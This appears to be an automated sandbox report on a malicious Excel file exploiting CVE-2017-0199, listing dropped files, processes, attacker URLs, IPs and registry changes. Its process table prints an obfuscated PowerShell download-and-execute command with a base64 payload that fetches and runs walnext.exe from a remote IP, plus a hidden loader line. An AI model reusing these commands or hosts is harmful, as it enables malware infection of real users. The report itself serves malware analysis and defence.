Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 04:37:38 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\walnext[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf
|
ASCII text, with very long lines (4175), with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\wlanext.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\wlanext.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\Desktop\~$SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B39DCB1F.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0fm0vfl2.3ju.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES6549.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 28 10:21:37 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\dkbbhokt.ygr.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eutt3eyl.a0a.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fmhhpwdc.f0i.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\l51134rf.bdn.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\yj2q5n4t.xgg.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF75AC2D79D8A2DD86.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFB828E4A960AEC6B0.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Drtrsklers.gje
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Netvrkslsninger.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\Revisionistiskes.int
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\fortje.kur
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Zigzaggy.aci
|
data
|
dropped
|
||
C:\Users\user\Desktop\C0230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\C0230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
|
dropped
|
There are 22 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex
bYpaSS -NOP -W 1
-c DEvIcEcreDEnTiAlDepLoymENt.exE ;
iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"
|
||
C:\Users\user\AppData\Roaming\wlanext.exe
|
"C:\Users\user\AppData\Roaming\wlanext.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence)
"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp"
"c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta
|
107.175.113.214
|
||
http://107.175.113.214/902/walnext.exe
|
107.175.113.214
|
||
https://qrisni.me/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta&fric3
|
unknown
|
||
https://qrisni.me/L
|
unknown
|
||
https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo
|
188.114.96.3
|
||
http://107.175.113.214/902/walne
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://www.bookinginfo.asia/pkeZmGiUuTK20.binr
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://107.175.113.214/
|
unknown
|
||
http://107.175.113.214/902/walnext.exed-
|
unknown
|
||
http://go.micros
|
unknown
|
||
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htahttp://1
|
unknown
|
||
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htapt-C:
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
http://107.175.113.214/902/walnext.exep
|
unknown
|
||
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta...ictio
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://107.175.113.214/902/walnext.exe9
|
unknown
|
||
https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&fricti
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
https://www.bookinginfo.asia/9
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
https://www.bookinginfo.asia/
|
unknown
|
||
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin
|
199.217.106.226
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
qrisni.me
|
188.114.96.3
|
||
bookinginfo.asia
|
199.217.106.226
|
||
www.bookinginfo.asia
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.175.113.214
|
unknown
|
United States
|
||
188.114.96.3
|
qrisni.me
|
European Union
|
||
199.217.106.226
|
bookinginfo.asia
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
o5/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28575
|
28575
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
7 /
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\321C3
|
321C3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\325C9
|
325C9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\dissentieringernes\Bilassistenters
|
soyuz
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 39 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2445F000
|
stack
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
2977000
|
trusted library allocation
|
page read and write
|
||
21651000
|
trusted library allocation
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
6730000
|
trusted library allocation
|
page read and write
|
||
215BD000
|
trusted library allocation
|
page read and write
|
||
5F60000
|
heap
|
page read and write
|
||
1BE4F000
|
stack
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
4D17000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2224000
|
remote allocation
|
page execute and read and write
|
||
65D0000
|
heap
|
page read and write
|
||
4CDD000
|
heap
|
page read and write
|
||
48C0000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
373B000
|
heap
|
page read and write
|
||
1C159000
|
heap
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
21D5F000
|
stack
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
43E000
|
unkown
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1AF90000
|
heap
|
page read and write
|
||
413F000
|
stack
|
page read and write
|
||
21700000
|
trusted library allocation
|
page execute and read and write
|
||
4CEE000
|
heap
|
page read and write
|
||
2AAF000
|
trusted library allocation
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
4CC1000
|
heap
|
page read and write
|
||
1CE0000
|
direct allocation
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
36F3000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
37BC000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
4CDB000
|
heap
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
2AB3000
|
trusted library allocation
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
1BF1E000
|
stack
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
3CA0000
|
trusted library allocation
|
page read and write
|
||
18F000
|
heap
|
page read and write
|
||
217B0000
|
trusted library allocation
|
page read and write
|
||
2ABB000
|
trusted library allocation
|
page read and write
|
||
D0000
|
heap
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
3F6F000
|
stack
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
24550000
|
heap
|
page execute and read and write
|
||
371C000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
30F0000
|
trusted library allocation
|
page read and write
|
||
5F66000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
1C1000
|
heap
|
page read and write
|
||
18F000
|
heap
|
page read and write
|
||
216A0000
|
heap
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
216F0000
|
trusted library allocation
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2AB2000
|
trusted library allocation
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
297F000
|
trusted library allocation
|
page read and write
|
||
18B000
|
stack
|
page read and write
|
||
1C0FD000
|
heap
|
page read and write
|
||
1C05C000
|
stack
|
page read and write
|
||
1A0000
|
direct allocation
|
page read and write
|
||
4AC0000
|
heap
|
page read and write
|
||
21820000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
371E000
|
heap
|
page read and write
|
||
1CA0000
|
direct allocation
|
page read and write
|
||
605E000
|
stack
|
page read and write
|
||
1BE0000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
21652000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
18F000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
21700000
|
trusted library allocation
|
page read and write
|
||
21A3D000
|
stack
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
210000
|
direct allocation
|
page read and write
|
||
3731000
|
heap
|
page read and write
|
||
248000
|
stack
|
page read and write
|
||
21700000
|
trusted library allocation
|
page read and write
|
||
1AA9C000
|
stack
|
page read and write
|
||
2979000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
direct allocation
|
page read and write
|
||
3C60000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
38E0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
315000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
2975000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
21700000
|
trusted library allocation
|
page read and write
|
||
4AC1000
|
heap
|
page read and write
|
||
14E000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
6520000
|
heap
|
page execute and read and write
|
||
7FE89A64000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
4ABB000
|
heap
|
page read and write
|
||
327C000
|
trusted library allocation
|
page read and write
|
||
28B000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
1C38C000
|
stack
|
page read and write
|
||
119000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2186E000
|
stack
|
page read and write
|
||
2260000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
138000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
220FE000
|
trusted library allocation
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
2423D000
|
stack
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
6720000
|
trusted library allocation
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
34C0000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
4ABC000
|
heap
|
page read and write
|
||
79000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
4A24000
|
remote allocation
|
page execute and read and write
|
||
312000
|
heap
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
2169E000
|
stack
|
page read and write
|
||
1CA0000
|
trusted library allocation
|
page read and write
|
||
272000
|
trusted library allocation
|
page read and write
|
||
7FE89890000
|
trusted library allocation
|
page read and write
|
||
376C000
|
heap
|
page read and write
|
||
4A0B000
|
heap
|
page read and write
|
||
3640000
|
heap
|
page read and write
|
||
2960000
|
remote allocation
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
270000
|
trusted library allocation
|
page read and write
|
||
2176E000
|
trusted library allocation
|
page read and write
|
||
61ED000
|
heap
|
page read and write
|
||
4CD6000
|
heap
|
page read and write
|
||
1E0000
|
direct allocation
|
page read and write
|
||
1710000
|
remote allocation
|
page execute and read and write
|
||
1C00000
|
trusted library allocation
|
page read and write
|
||
21651000
|
trusted library allocation
|
page read and write
|
||
2FA000
|
heap
|
page read and write
|
||
49DC000
|
heap
|
page read and write
|
||
21D0E000
|
stack
|
page read and write
|
||
2AAE000
|
trusted library allocation
|
page read and write
|
||
4B13000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
1C8BA000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
36D5000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
1C0DE000
|
stack
|
page read and write
|
||
44D000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
4A03000
|
heap
|
page read and write
|
||
190000
|
direct allocation
|
page read and write
|
||
2C24000
|
remote allocation
|
page execute and read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
3C60000
|
trusted library allocation
|
page read and write
|
||
2194E000
|
stack
|
page read and write
|
||
60F7000
|
heap
|
page read and write
|
||
368000
|
heap
|
page read and write
|
||
36C0000
|
heap
|
page read and write
|
||
1C84000
|
heap
|
page read and write
|
||
225F000
|
stack
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
1CE3000
|
direct allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7FE89936000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
1FB0000
|
heap
|
page read and write
|
||
F3000
|
heap
|
page read and write
|
||
4B12000
|
heap
|
page read and write
|
||
21C5E000
|
stack
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
664F000
|
heap
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
4900000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
4CD1000
|
heap
|
page read and write
|
||
21810000
|
trusted library allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
3C5E000
|
stack
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
2ABE000
|
trusted library allocation
|
page read and write
|
||
220C000
|
trusted library allocation
|
page read and write
|
||
3CE5000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
1C0E9000
|
heap
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
3460000
|
direct allocation
|
page read and write
|
||
1C3A0000
|
heap
|
page read and write
|
||
1A71C000
|
stack
|
page read and write
|
||
70000
|
trusted library allocation
|
page read and write
|
||
1AF6000
|
heap
|
